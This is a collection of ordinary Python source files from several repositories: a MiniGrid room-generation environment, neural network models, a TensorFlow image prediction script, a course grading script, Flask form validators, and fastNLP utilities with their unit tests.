self.agent_dir = self._rand_int(0, 4) # assuming random start direction else: self.place_agent() if self._goal_default_pos is not None: goal = Goal() self.put_obj(goal, *self._goal_default_pos) goal.init_pos, goal.cur_pos = self._goal_default_pos else: self.place_obj(Goal()) self.mission = 'Reach the goal' def step(self, action): obs, reward, done, info = MiniGridEnv.step(self, action) return obs, reward, done, info class Room: def __init__(self, top, size, entryDoorPos, exitDoorPos ): self.top = top self.size = size self.entryDoorPos = entryDoorPos self.exitDoorPos = exitDoorPos class MultiRoom(MiniGridEnv): """ Environment with multiple rooms (subgoals) """ def __init__(self, minNumRooms, maxNumRooms, maxRoomSize=10, gridSize=25 ): assert minNumRooms > 0 assert maxNumRooms >= minNumRooms assert maxRoomSize >= 4 self.minNumRooms = minNumRooms self.maxNumRooms = maxNumRooms self.maxRoomSize = maxRoomSize self.rooms = [] super(MultiRoom, self).__init__( grid_size=gridSize, max_steps=self.maxNumRooms * 20 ) def _gen_grid(self, width, height): roomList = [] # Choose a random number of rooms to generate numRooms = self._rand_int(self.minNumRooms, self.maxNumRooms+1) while len(roomList) < numRooms: curRoomList = [] entryDoorPos = ( self._rand_int(0, width - 2), self._rand_int(0, width - 2) ) # Recursively place the rooms self._placeRoom( numRooms, roomList=curRoomList, minSz=4, maxSz=self.maxRoomSize, entryDoorWall=2, entryDoorPos=entryDoorPos ) if len(curRoomList) > len(roomList): roomList = curRoomList # Store the list of rooms in this environment assert len(roomList) > 0 self.rooms = roomList # Create the grid self.grid = Grid(width, height) wall = Wall() prevDoorColor = None # For each room for idx, room in enumerate(roomList): topX, topY = room.top sizeX, sizeY = room.size # Draw the top and bottom walls for i in range(0, sizeX): self.grid.set(topX + i, topY, wall) self.grid.set(topX + i, topY + sizeY - 1, wall) # Draw the left and right walls for j in range(0, sizeY): self.grid.set(topX, topY + j, wall) self.grid.set(topX + sizeX - 1, topY + j, wall) # If this isn't the first room, place the entry door if idx > 0: # Pick a door color different from the previous one doorColors = set(COLOR_NAMES) if prevDoorColor: doorColors.remove(prevDoorColor) # Note: the use of sorting here guarantees determinism, # This is needed because Python's set is not deterministic doorColor = self._rand_elem(sorted(doorColors)) entryDoor = Door(doorColor) self.grid.set(*room.entryDoorPos, entryDoor) prevDoorColor = doorColor prevRoom = roomList[idx-1] prevRoom.exitDoorPos = room.entryDoorPos # Randomize the starting agent position and direction self.place_agent(roomList[0].top, roomList[0].size) # Place the final goal in the last room self.goal_pos = self.place_obj(Goal(), roomList[-1].top, roomList[-1].size) self.mission = 'traverse the rooms to get to the goal' def _placeRoom( self, numLeft, roomList, minSz, maxSz, entryDoorWall, entryDoorPos ): # Choose the room size randomly sizeX = self._rand_int(minSz, maxSz+1) sizeY = self._rand_int(minSz, maxSz+1) # The first room will be at the door position if len(roomList) == 0: topX, topY = entryDoorPos # Entry on the right elif entryDoorWall == 0: topX = entryDoorPos[0] - sizeX + 1 y = entryDoorPos[1] topY = self._rand_int(y - sizeY + 2, y) # Entry wall on the south elif entryDoorWall == 1: x = entryDoorPos[0] topX = self._rand_int(x - sizeX + 2, x) topY = entryDoorPos[1] - sizeY + 1 # Entry wall on the left elif entryDoorWall == 2: topX = entryDoorPos[0] y = entryDoorPos[1] topY = self._rand_int(y - sizeY + 2, y) # Entry wall on the top elif entryDoorWall == 3: x = entryDoorPos[0] topX = self._rand_int(x - sizeX + 2, x) topY = entryDoorPos[1] else: assert False, entryDoorWall # If the room is out of the grid, can't place a room here if topX < 0 or topY < 0: return False if topX + sizeX > self.width or topY + sizeY >= self.height: return False # If the room intersects with previous rooms, can't place it here for room in roomList[:-1]: nonOverlap = \ topX + sizeX < room.top[0] or \ room.top[0] + room.size[0] <= topX or \ topY + sizeY < room.top[1] or \ room.top[1] + room.size[1] <= topY if not nonOverlap: return False # Add this room to the list roomList.append(Room( (topX, topY), (sizeX, sizeY), entryDoorPos, None )) # If this was the last room, stop if numLeft == 1: return True # Try placing the next room for i in range(0, 8): # Pick which wall to place the out door on wallSet = set((0, 1, 2, 3)) wallSet.remove(entryDoorWall) exitDoorWall = self._rand_elem(sorted(wallSet)) nextEntryWall = (exitDoorWall + 2) % 4 # Pick the exit door position # Exit on right wall if exitDoorWall == 0: exitDoorPos = ( topX + sizeX - 1, topY + self._rand_int(1, sizeY - 1) ) # Exit on south wall elif exitDoorWall == 1: exitDoorPos = ( topX + self._rand_int(1, sizeX - 1), topY + sizeY - 1 ) # Exit on left wall elif exitDoorWall == 2: exitDoorPos = ( topX, topY + self._rand_int(1, sizeY - 1) ) # Exit on north wall elif exitDoorWall == 3: exitDoorPos = ( topX + self._rand_int(1, sizeX - 1), topY ) else: assert False # Recursively create the other rooms success = self._placeRoom( numLeft - 1, roomList=roomList, minSz=minSz, maxSz=maxSz, entryDoorWall=nextEntryWall, entryDoorPos=exitDoorPos ) if success: break return True ``` #### File: dqn/dsr/idf_model.py ```python import torch import torch.nn as nn import torch.nn.functional as F from rlpyt.utils.tensor import infer_leading_dims, restore_leading_dims from rlpyt.models.mlp import MlpModel from rlpyt.models.utils import FUNCTION_MAP, Reshape class IDFModel(torch.nn.Module): def __init__( self, image_shape, output_size, feature_size=64 ): super().__init__() h, w, c = image_shape self.output_size = output_size self.feature_size = feature_size conv_embedding_size = 16 * (((h - 3) // 2) - 1) ** 2 self.encoder = nn.Sequential( nn.Conv2d(c, 16, (3, 3), stride=2), nn.ReLU(), nn.Conv2d(16, 16, (3, 3), stride=1), nn.ReLU(), nn.Flatten(), nn.Linear(conv_embedding_size, self.feature_size) ) self.inverse = nn.Sequential( nn.Linear(feature_size * 2, self.output_size) ) def forward(self, obs, next_obs=None, mode='inverse'): x = obs.type(torch.float) if mode == 'inverse': next_x = next_obs.type(torch.float) return self.inverse(torch.cat((x, next_x), dim=1)) elif mode == 'encode': x = x.permute(0, 3, 1, 2) return self.encoder(x) else: raise ValueError('Invalid mode!') ```
{ "source": "2016gary/RealTimeIR", "score": 3 }
#### File: RealTimeIR/Python/predict.py ```python from skimage import io, transform import glob import tensorflow as tf import numpy as np path = 'E:/RealTimeIR/predict/' # 将所有的图片resize成128*128 w = 100 h = 100 c = 3 # 读取图片 def read_img(path): imgs = [] for im in glob.glob(path + '*.jpg'): img = io.imread(im) img = transform.resize(img, (w, h, c), mode="reflect") imgs.append(img) return np.asarray(imgs, np.float32) # 将预测图片转为数据集 x_train = read_img(path) # -----------------使用跟模型一致的网络---------------------- x = tf.placeholder(tf.float32, shape=[None, w, h, c], name='x') # 第一个卷积层(100->50) # Tensorflow中padding有两种类型SAME和VALID SAME填充0使维度保持不变 VALID不填充0 conv1 = tf.layers.conv2d( inputs=x, filters=32, kernel_size=[5, 5], padding="same", activation=tf.nn.relu, kernel_initializer=tf.truncated_normal_initializer(stddev=0.01)) pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2) # 第二个卷积层(50->25) conv2 = tf.layers.conv2d( inputs=pool1, filters=64, kernel_size=[5, 5], padding="same", activation=tf.nn.relu, kernel_initializer=tf.truncated_normal_initializer(stddev=0.01)) pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2) # 第三个卷积层(25->12) conv3 = tf.layers.conv2d( inputs=pool2, filters=128, kernel_size=[3, 3], padding="same", activation=tf.nn.relu, kernel_initializer=tf.truncated_normal_initializer(stddev=0.01)) pool3 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[2, 2], strides=2) # 第四个卷积层(12->6) conv4 = tf.layers.conv2d( inputs=pool3, filters=128, kernel_size=[3, 3], padding="same", activation=tf.nn.relu, kernel_initializer=tf.truncated_normal_initializer(stddev=0.01)) pool4 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2) re1 = tf.reshape(pool4, [-1, 6 * 6 * 128]) # 全连接层 dense1 = tf.layers.dense(inputs=re1, units=1024, activation=tf.nn.relu, kernel_initializer=tf.truncated_normal_initializer(stddev=0.01), kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003)) dense2 = tf.layers.dense(inputs=dense1, units=512, activation=tf.nn.relu, kernel_initializer=tf.truncated_normal_initializer(stddev=0.01), kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003)) # 最后输出层使用10个神经元得到10维向量对应分类 logits = tf.layers.dense(inputs=dense2, units=10, activation=None, kernel_initializer=tf.truncated_normal_initializer(stddev=0.01), kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003)) # ---------------------------网络结束--------------------------- sess = tf.InteractiveSession() # 加载模型进当前会话 saver = tf.train.Saver() saver.restore(sess, 'E:/RealTimeIR/model/10-image-set') # 使用模型进行预测 predictions = sess.run(tf.argmax(logits, 1), feed_dict={x: x_train}) # print("输出predictions:", predictions) for predict in predictions: if predict == 0: result = "单车" print("识别结果:单车") elif predict == 1: result = "书" print("识别结果:书") elif predict == 2: result = "水瓶" print("识别结果:水瓶") elif predict == 3: result = "汽车" print("识别结果:汽车") elif predict == 4: result = "椅子" print("识别结果:椅子") elif predict == 5: result = "电脑" print("识别结果:电脑") elif predict == 6: result = "人脸" print("识别结果:人脸") elif predict == 7: result = "鞋子" print("识别结果:鞋子") elif predict == 8: result = "桌子" print("识别结果:桌子") elif predict == 9: result = "树" print("识别结果:树") else: result = "识别错误" print("识别错误") file_object = open('E:/RealTimeIR/result.txt', 'w+') # 清空文件内容 file_object.truncate() file_object.write(result) file_object.close() sess.close() ```
{ "source": "2016-spring-csuf-benblazak-cpsc-121/course-materials", "score": 2 }
#### File: 2016-spring-csuf-benblazak-cpsc-121/course-materials/grades.py ```python import os import os.path import requests import sys from collections import OrderedDict import github3 import common import standards import students # ----------------------------------------------------------------------------- class Error(Exception): pass class Namespace(): pass # ----------------------------------------------------------------------------- def _gen_grades(): filedir = os.path.dirname(os.path.abspath(__file__)) if common.DEBUG: studentdir = './test/students' else: studentdir = '../../../students' studentdir = os.path.abspath(os.path.join(filedir, studentdir)) assignmentsfile = os.path.join(studentdir, 'assignments.gen.py') scandir = os.path.join(studentdir, 'scans') # ......................................................................... name2cwid = { v['github'].lower():k for k,v in students.students.items() if 'github' in v } grades = { cwid: OrderedDict( [ ('extra credit', 0), ('overall', None), ('predictions', OrderedDict()), ] + [ ((g,s,),OrderedDict()) for g,ss in standards.groups.items() for s in ss ] ) for cwid in students.students } # ......................................................................... # from github github = github3.GitHub() try: for r in sorted([ r.name for r in github.iter_user_repos(common.org) ]): if r in ( 'course-materials', ): continue assignment = 'a' + r[-2:] for cwid in students.students: grades[cwid][('assignment completion', '')][assignment] = None for pr in github.iter_repo_issues(common.org, r, state='all'): name = pr.user.login.lower() if name not in name2cwid: continue grades[name2cwid[name]] \ [('assignment completion', '')] \ [assignment] = True with open(assignmentsfile, 'w') as f: f.write(repr({ cwid: grades[cwid][('assignment completion', '')] for cwid in grades })) except (requests.exceptions.ConnectionError, github3.models.GitHubError): print('WARNING: taking assignment grades from file', file=sys.stderr) assignments = eval(open(assignmentsfile).read()) none = OrderedDict([ (a, None) for a in assignments[list(assignments.keys())[0]] ]) for cwid in grades: if cwid in assignments: grades[cwid][('assignment completion', '')] = assignments[cwid] else: grades[cwid][('assignment completion', '')] = none # ......................................................................... # from scans for d in sorted(os.listdir(scandir)): if d.startswith('.'): continue i = Namespace() (i.date, i.assessment, i.standards) = d.split(',', maxsplit=2) i.standards = [ standards.lookup(s) for s in i.standards.split(',') ] for cwid in students.students: for sta in i.standards: grades[cwid][sta][i.assessment] = None for f in os.listdir(os.path.join(scandir, d)): if f.startswith('.'): continue if f.startswith('_'): continue if ',' not in f: raise Error( 'WARNING: no comma in' + ' "' + os.path.join(d, f) + '"' ) (i.name, i.scores) = \ f.split('.',maxsplit=1)[0].split(',', maxsplit=1) if len(i.scores) != len(i.standards): raise Error( 'WARNING: mismatch in number of scores for' + ' "' + os.path.join(d, f) + '"' ) i.scores = [ None if s == 'x' else 3.5 if s == '5' else 3.75 if s == '7' else int(s) for s in i.scores ] for sta,sco in zip(i.standards,i.scores): try: grades[students.lookup(i.name)][sta][i.assessment] = sco except students.Error: raise Error( 'Name lookup failed for ' + ' "' + os.path.join(d, f) + '"' ) # ......................................................................... # from file private = common.importfile(os.path.join(studentdir, 'grades.py')) for cwid in private.grades: if cwid in grades: grades[cwid].update(private.grades[cwid]) else: grades[cwid] = private.grades[cwid] # ......................................................................... for cwid in grades: overall = 0 maximum = 0 for sta,assessments in grades[cwid].items(): if isinstance(sta, str): continue scos = [ sco for sco in assessments.values() if sco is not None ] if sta == ('assignment completion', ''): sco = len(scos)/len(assessments) if len(assessments) > 0 else 0 assessments['overall'] = sco overall += sco * standards.multipliers[sta] maximum += standards.multipliers[sta] continue if len(scos) == 0: assessments['overall'] = None else: if len(scos) == 1 or scos[-1] >= scos[-2]: sco = scos[-1] else: # scos[-1] < scos[-2] sco = [ sco for sco in [1, 2, 3, 3.5, 3.75, 4] if (scos[-1]+scos[-2])/2 <= sco ][0] assessments['overall'] = sco if sco >= 3: overall += sco / 4 * standards.multipliers[sta] maximum += standards.multipliers[sta] ec = grades[cwid]['extra credit'] * 0.002 if grades[cwid]['overall'] is None: grades[cwid]['overall'] = overall + ec grades[cwid]['predictions']['current grade'] = grades[cwid]['overall'] if maximum == 0: grades[cwid]['predictions']['average'] = None grades[cwid]['predictions']['maximum without reassessing'] = None else: grades[cwid]['predictions']['average'] = overall / maximum grades[cwid]['predictions']['maximum without reassessing'] = \ 1 - maximum + overall + ec # ......................................................................... return grades # ----------------------------------------------------------------------------- grades = _gen_grades() # ----------------------------------------------------------------------------- # SECTION BEGIN letter def letter(percent): if percent >= 97: return 'A+' elif percent >= 93: return 'A' elif percent >= 90: return 'A-' elif percent >= 87: return 'B+' elif percent >= 83: return 'B' elif percent >= 80: return 'B-' elif percent >= 77: return 'C+' elif percent >= 70: return 'C' elif percent >= 50: return 'D' else : return 'F' # SECTION END letter ```
{ "source": "201701203/question-paper-generator", "score": 3 }
#### File: blueprints/courses/forms.py ```python from flask_login import current_user from flask_wtf import FlaskForm from sqlalchemy import and_ from sqlalchemy import func from sqlalchemy.sql import label from wtforms import BooleanField from wtforms import IntegerField from wtforms import StringField from wtforms import SubmitField from wtforms.validators import DataRequired from wtforms.validators import NumberRange from wtforms.validators import ValidationError from flaskapp import db from flaskapp.models import Course from flaskapp.models import Unit def validate_course_name(form, course_name): """Validation of course name Args: form (FlaskForm): In which given description about course course_name (StringField): Name of course Raises: ValidationError: If already exist then error of That Course is already exist. Please choose a different one. else add the course """ course = Course.query.filter( and_(Course.name == course_name.data, Course.teacher == current_user)).first() if course: raise ValidationError( "That Course is already exist. Please choose a different one.") def validate_unit_name(form, unit_name): """Validation on unit name of the course Args: form (FlaskForm): Form i which all the details of unit unit_name (StringField): Name of unit that user want to add Raises: ValidationError: If already there then give error of That Unit is already exist. Please choose a different one. else add name of unit """ unit = Unit.query.filter( and_(Unit.name == unit_name.data, Unit.course == form.course)).first() if unit: raise ValidationError( "That Unit is already exist. Please choose a different one.") def validate_chapter_no(form, chapter_no): unit = Unit.query.filter( and_(Unit.chapter_no == chapter_no.data, Unit.course == form.course)).first() if unit: raise ValidationError( "That Unit is already exist. Please choose a different one.") units = Unit.query.filter(Unit.course == form.course).all() if units: max_chapter_no = max(map(lambda _unit: int(_unit.chapter_no), units)) if max_chapter_no and (max_chapter_no - chapter_no.data) < -1: raise ValidationError( f"Please crete unit:{max_chapter_no + 1} first.") class CourseForm(FlaskForm): course = StringField("Course", validators=[DataRequired(), validate_course_name]) include_asked = BooleanField("Should paper include asked questions?") submit = SubmitField("submit") class UnitForm(FlaskForm): chapter_no = IntegerField( "Chapter No.", validators=[ DataRequired(), NumberRange(1, 101, "Units can't be more than 100"), validate_chapter_no, ], ) name = StringField("Name", validators=[DataRequired(), validate_unit_name]) submit = SubmitField("submit") def __init__(self, course): self.course = course super().__init__() ``` #### File: test/papers/test_paper_generate_request.py ```python from flask import json from flaskapp.models import Paper from test.main.base_classes import BaseMCQQuestion from test.main.base_classes import BaseSubQuestion from test.main.utils import test_post_request class PaperGenerateRequest(BaseSubQuestion, BaseMCQQuestion): def test_paper_generate_request(self): data = dict(questions=[1, 2, 3], total_marks=30) response = self.client.post( "/course/1/papers/generate/request", data=json.dumps(data), headers={"Content-Type": "application/json"}, ) self.assertIn( (b"You should be redirected automatically to target URL: " b"<a href=/course/1/papers/generate/form/ >"), response.data, ) def test_handle_conflicting_questions(self): data = dict(mcq={ "ask": [1, 3], "nask": [2, 4] }, sub={ "ask": [1, 3], "nask": [2, 4] }) response = self.client.post( "/papers/handle/conflicts", data=json.dumps(data), headers={"Content-Type": "application/json"}, ) data1 = json.loads(response.get_data(as_text=True)) self.assertEqual(data1["status"], "OK") def test_mark_distribution_form(self): self.test_paper_generate_request() data = { "Unit:01": "30", "Knowledge": "10", "Comprehension": "10", "Application": "10", "Easy": "10", "Medium": "10", "Hard": "10", "Que.1.A": "5", "Que.2.A": "5", "Que.2.B": "5", "Que.3.A": "5", "Que.3.B": "5", "Que.3.C": "5", "sub": 15, "mcq": 15, } response, _ = test_post_request(self, "/course/1/papers/generate/form/", data) self.assertIn(b"<title>Mark Distribution</title>", response.data) response = self.client.post( "/course/1/papers/confirm/template/", data=json.dumps(dict(status="OK")), headers={"Content-Type": "application/json"}, ) self.assertIn( (b"You should be redirected automatically to target URL: " b"<a href=/course/1/papers/generate/ >"), response.data, ) def test_generate_and_confirm_paper(self): self.test_paper_generate_request() self.test_mark_distribution_form() data = { "name": "paper1", "term": "winter", "exam_date": "2020-10-15", "time_limit": "2", } test_post_request(self, "/course/1/papers/generate/", data, Paper, 1) # testing gerenated paper with self.mail.record_messages() as outbox: data = {"generate": "YES", "examiner_email": "<EMAIL>"} test_post_request(self, "papers/confirm/1", data=data) self.assertEqual(1, len(outbox)) self.assertEqual("Paper for paper1", outbox[0].subject) def test_pdf_paper(self): self.test_paper_generate_request() self.test_mark_distribution_form() self.test_generate_and_confirm_paper() response = self.client.get('/papers/1') self.assertIn(b"Answer the following Multiple choice questions", response.data) ```
{ "source": "2017alan/fastNLP", "score": 3 }
#### File: fastNLP/core/loss.py ```python import torch class Loss(object): """Loss function of the algorithm, either the wrapper of a loss function from framework, or a user-defined loss (need pytorch auto_grad support) """ def __init__(self, args): """ :param args: None or str, the name of a loss function. """ if args is None: # this is useful when Trainer.__init__ performs type check self._loss = None elif isinstance(args, str): self._loss = self._borrow_from_pytorch(args) else: raise NotImplementedError def get(self): """ :return self._loss: the loss function """ return self._loss @staticmethod def _borrow_from_pytorch(loss_name): """Given a name of a loss function, return it from PyTorch. :param loss_name: str, the name of a loss function :return loss: a PyTorch loss """ if loss_name == "cross_entropy": return torch.nn.CrossEntropyLoss() elif loss_name == 'nll': return torch.nn.NLLLoss() else: raise NotImplementedError ``` #### File: fastNLP/modules/utils.py ```python from collections import defaultdict import numpy as np import torch import torch.nn.init as init import torch.nn as nn def mask_softmax(matrix, mask): if mask is None: result = torch.nn.functional.softmax(matrix, dim=-1) else: raise NotImplementedError return result def initial_parameter(net ,initial_method =None): if initial_method == 'xavier_uniform': init_method = init.xavier_uniform_ elif initial_method=='xavier_normal': init_method = init.xavier_normal_ elif initial_method == 'kaiming_normal' or initial_method =='msra': init_method = init.kaiming_normal elif initial_method == 'kaiming_uniform': init_method = init.kaiming_normal elif initial_method == 'orthogonal': init_method = init.orthogonal_ elif initial_method == 'sparse': init_method = init.sparse_ elif initial_method =='normal': init_method = init.normal_ elif initial_method =='uniform': initial_method = init.uniform_ else: init_method = init.xavier_normal_ def weights_init(m): # classname = m.__class__.__name__ if isinstance(m, nn.Conv2d) or isinstance(m,nn.Conv1d) or isinstance(m,nn.Conv3d): # for all the cnn if initial_method != None: init_method(m.weight.data) else: init.xavier_normal_(m.weight.data) init.normal_(m.bias.data) elif isinstance(m, nn.LSTM): for w in m.parameters(): if len(w.data.size())>1: init_method(w.data) # weight else: init.normal_(w.data) # bias elif hasattr(m, 'weight') and m.weight.requires_grad: init_method(m.weight.data) else: for w in m.parameters() : if w.requires_grad: if len(w.data.size())>1: init_method(w.data) # weight else: init.normal_(w.data) # bias # print("init else") net.apply(weights_init) def seq_mask(seq_len, max_len): mask = [torch.ge(torch.LongTensor(seq_len), i + 1) for i in range(max_len)] mask = torch.stack(mask, 1) return mask """ Codes from FudanParser. Not tested. Do not use !!! """ def expand_gt(gt): """expand_gt: Expand ground truth to matrix Arguments: gt: tensor of (n, l) Return: f: ground truth matrix of (n, l), $gt[i][j] = k$ leads to $f[i][j][k] = 1$. """ n, l = gt.shape ret = torch.zeros(n, l, l).long() for i in range(n): ret[i][torch.arange(l).long(), gt[i]] = 1 return ret def greedy_decoding(arc_f): """greedy_decoding Arguments: arc_f: a tensor in shape of (n, l+1, l+1) length of the sentence is l and index 0 is <root> Output: arc_pred: a tensor in shape of (n, l), indicating the head words """ f_arc = arc_f[:, 1:, :] # ignore the root _, arc_pred = torch.max(f_arc.data, dim=-1, keepdim=False) return arc_pred def mst_decoding(arc_f): batch_size = arc_f.shape[0] length = arc_f.shape[1] arc_score = arc_f.data.cpu() pred_collection = [] for i in range(batch_size): head = mst(arc_score[i].numpy()) pred_collection.append(head[1:].reshape((1, length - 1))) arc_pred = torch.LongTensor(np.concatenate(pred_collection, axis=0)).type_as(arc_f).long() return arc_pred def outer_product(features): """InterProduct: Get inter sequence product of features Arguments: features: feature vectors of sequence in the shape of (n, l, h) Return: f: product result in (n, l, l, h) shape """ n, l, c = features.shape features = features.contiguous() x = features.view(n, l, 1, c) x = x.expand(n, l, l, c) y = features.view(n, 1, l, c).contiguous() y = y.expand(n, l, l, c) return x * y def outer_concat(features): """InterProduct: Get inter sequence concatenation of features Arguments: features: feature vectors of sequence in the shape of (n, l, h) Return: f: product result in (n, l, l, h) shape """ n, l, c = features.shape x = features.contiguous().view(n, l, 1, c) x = x.expand(n, l, l, c) y = features.view(n, 1, l, c) y = y.expand(n, l, l, c) return torch.cat((x, y), dim=3) def mst(scores): """ https://github.com/tdozat/Parser/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/models/nn.py#L692 # NOQA """ length = scores.shape[0] min_score = scores.min() - 1 eye = np.eye(length) scores = scores * (1 - eye) + min_score * eye heads = np.argmax(scores, axis=1) heads[0] = 0 tokens = np.arange(1, length) roots = np.where(heads[tokens] == 0)[0] + 1 if len(roots) < 1: root_scores = scores[tokens, 0] head_scores = scores[tokens, heads[tokens]] new_root = tokens[np.argmax(root_scores / head_scores)] heads[new_root] = 0 elif len(roots) > 1: root_scores = scores[roots, 0] scores[roots, 0] = 0 new_heads = np.argmax(scores[roots][:, tokens], axis=1) + 1 new_root = roots[np.argmin( scores[roots, new_heads] / root_scores)] heads[roots] = new_heads heads[new_root] = 0 edges = defaultdict(set) vertices = set((0,)) for dep, head in enumerate(heads[tokens]): vertices.add(dep + 1) edges[head].add(dep + 1) for cycle in _find_cycle(vertices, edges): dependents = set() to_visit = set(cycle) while len(to_visit) > 0: node = to_visit.pop() if node not in dependents: dependents.add(node) to_visit.update(edges[node]) cycle = np.array(list(cycle)) old_heads = heads[cycle] old_scores = scores[cycle, old_heads] non_heads = np.array(list(dependents)) scores[np.repeat(cycle, len(non_heads)), np.repeat([non_heads], len(cycle), axis=0).flatten()] = min_score new_heads = np.argmax(scores[cycle][:, tokens], axis=1) + 1 new_scores = scores[cycle, new_heads] / old_scores change = np.argmax(new_scores) changed_cycle = cycle[change] old_head = old_heads[change] new_head = new_heads[change] heads[changed_cycle] = new_head edges[new_head].add(changed_cycle) edges[old_head].remove(changed_cycle) return heads def _find_cycle(vertices, edges): """ https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm # NOQA https://github.com/tdozat/Parser/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/etc/tarjan.py # NOQA """ _index = 0 _stack = [] _indices = {} _lowlinks = {} _onstack = defaultdict(lambda: False) _SCCs = [] def _strongconnect(v): nonlocal _index _indices[v] = _index _lowlinks[v] = _index _index += 1 _stack.append(v) _onstack[v] = True for w in edges[v]: if w not in _indices: _strongconnect(w) _lowlinks[v] = min(_lowlinks[v], _lowlinks[w]) elif _onstack[w]: _lowlinks[v] = min(_lowlinks[v], _indices[w]) if _lowlinks[v] == _indices[v]: SCC = set() while True: w = _stack.pop() _onstack[w] = False SCC.add(w) if not (w != v): break _SCCs.append(SCC) for v in vertices: if v not in _indices: _strongconnect(v) return [SCC for SCC in _SCCs if len(SCC) > 1] # https://github.com/alykhantejani/nninit/blob/master/nninit.py def orthogonal(tensor, gain=1): """Fills the input Tensor or Variable with a (semi) orthogonal matrix. The input tensor must have at least 2 dimensions, and for tensors with more than 2 dimensions the trailing dimensions are flattened. viewed as 2D representation with rows equal to the first dimension and columns equal to the product of as a sparse matrix, where the non-zero elements will be drawn from a normal distribution with mean=0 and std=`std`. Reference: "Exact solutions to the nonlinear dynamics of learning in deep linear neural networks" - Saxe, A. et al. Args: tensor: a n-dimension torch.Tensor, where n >= 2 gain: optional gain to be applied Examples: >>> w = torch.Tensor(3, 5) >>> nninit.orthogonal(w) """ if tensor.ndimension() < 2: raise ValueError("Only tensors with 2 or more dimensions are supported.") flattened_shape = (tensor.size(0), int(np.prod(tensor.detach().numpy().shape[1:]))) flattened = torch.Tensor(flattened_shape[0], flattened_shape[1]).normal_(0, 1) u, s, v = np.linalg.svd(flattened.numpy(), full_matrices=False) if u.shape == flattened.detach().numpy().shape: tensor.view_as(flattened).copy_(torch.from_numpy(u)) else: tensor.view_as(flattened).copy_(torch.from_numpy(v)) tensor.mul_(gain) with torch.no_grad(): return tensor def generate_step_dropout(masks, hidden_dim, step_dropout, training=False): # assume batch first # import pdb # pdb.set_trace() batch, length = masks.size() if not training: return torch.ones(batch, length, hidden_dim).fill_(1 - step_dropout).cuda(masks.device) * masks.view(batch, length, 1) masked = torch.zeros(batch, 1, hidden_dim).fill_(step_dropout) masked = torch.bernoulli(masked).repeat(1, length, 1) masked = masked.cuda(masks.device) * masks.view(batch, length, 1) return masked ``` #### File: test/core/test_preprocess.py ```python import os import unittest from fastNLP.core.dataset import DataSet from fastNLP.core.preprocess import SeqLabelPreprocess data = [ [['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']], [['Hello', 'world', '!'], ['a', 'n', '.']], [['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']], [['Hello', 'world', '!'], ['a', 'n', '.']], [['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']], [['Hello', 'world', '!'], ['a', 'n', '.']], [['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']], [['Hello', 'world', '!'], ['a', 'n', '.']], [['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']], [['Hello', 'world', '!'], ['a', 'n', '.']], ] class TestCase1(unittest.TestCase): def test(self): if os.path.exists("./save"): for root, dirs, files in os.walk("./save", topdown=False): for name in files: os.remove(os.path.join(root, name)) for name in dirs: os.rmdir(os.path.join(root, name)) result = SeqLabelPreprocess().run(train_dev_data=data, train_dev_split=0.4, pickle_path="./save") self.assertEqual(len(result), 2) self.assertEqual(type(result[0]), DataSet) self.assertEqual(type(result[1]), DataSet) os.system("rm -rf save") print("pickle path deleted") class TestCase2(unittest.TestCase): def test(self): if os.path.exists("./save"): for root, dirs, files in os.walk("./save", topdown=False): for name in files: os.remove(os.path.join(root, name)) for name in dirs: os.rmdir(os.path.join(root, name)) result = SeqLabelPreprocess().run(test_data=data, train_dev_data=data, pickle_path="./save", train_dev_split=0.4, cross_val=False) self.assertEqual(len(result), 3) self.assertEqual(type(result[0]), DataSet) self.assertEqual(type(result[1]), DataSet) self.assertEqual(type(result[2]), DataSet) os.system("rm -rf save") print("pickle path deleted") class TestCase3(unittest.TestCase): def test(self): num_folds = 2 result = SeqLabelPreprocess().run(test_data=None, train_dev_data=data, pickle_path="./save", train_dev_split=0.4, cross_val=True, n_fold=num_folds) self.assertEqual(len(result), 2) self.assertEqual(len(result[0]), num_folds) self.assertEqual(len(result[1]), num_folds) for data_set in result[0] + result[1]: self.assertEqual(type(data_set), DataSet) os.system("rm -rf save") print("pickle path deleted") ``` #### File: test/core/test_tester.py ```python import os import unittest from fastNLP.core.dataset import DataSet from fastNLP.core.field import TextField from fastNLP.core.instance import Instance from fastNLP.core.tester import SeqLabelTester from fastNLP.models.sequence_modeling import SeqLabeling data_name = "pku_training.utf8" pickle_path = "data_for_tests" class TestTester(unittest.TestCase): def test_case_1(self): model_args = { "vocab_size": 10, "word_emb_dim": 100, "rnn_hidden_units": 100, "num_classes": 5 } valid_args = {"save_output": True, "validate_in_training": True, "save_dev_input": True, "save_loss": True, "batch_size": 2, "pickle_path": "./save/", "use_cuda": False, "print_every_step": 1} train_data = [ [['a', 'b', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']], [['a', '@', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']], [['a', 'b', '#', 'd', 'e'], ['a', '@', 'c', 'd', 'e']], [['a', 'b', 'c', '?', 'e'], ['a', '@', 'c', 'd', 'e']], [['a', 'b', 'c', 'd', '$'], ['a', '@', 'c', 'd', 'e']], [['!', 'b', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']], ] vocab = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, '!': 5, '@': 6, '#': 7, '$': 8, '?': 9} label_vocab = {'a': 0, '@': 1, 'c': 2, 'd': 3, 'e': 4} data_set = DataSet() for example in train_data: text, label = example[0], example[1] x = TextField(text, False) y = TextField(label, is_target=True) ins = Instance(word_seq=x, label_seq=y) data_set.append(ins) data_set.index_field("word_seq", vocab) data_set.index_field("label_seq", label_vocab) model = SeqLabeling(model_args) tester = SeqLabelTester(**valid_args) tester.test(network=model, dev_data=data_set) # 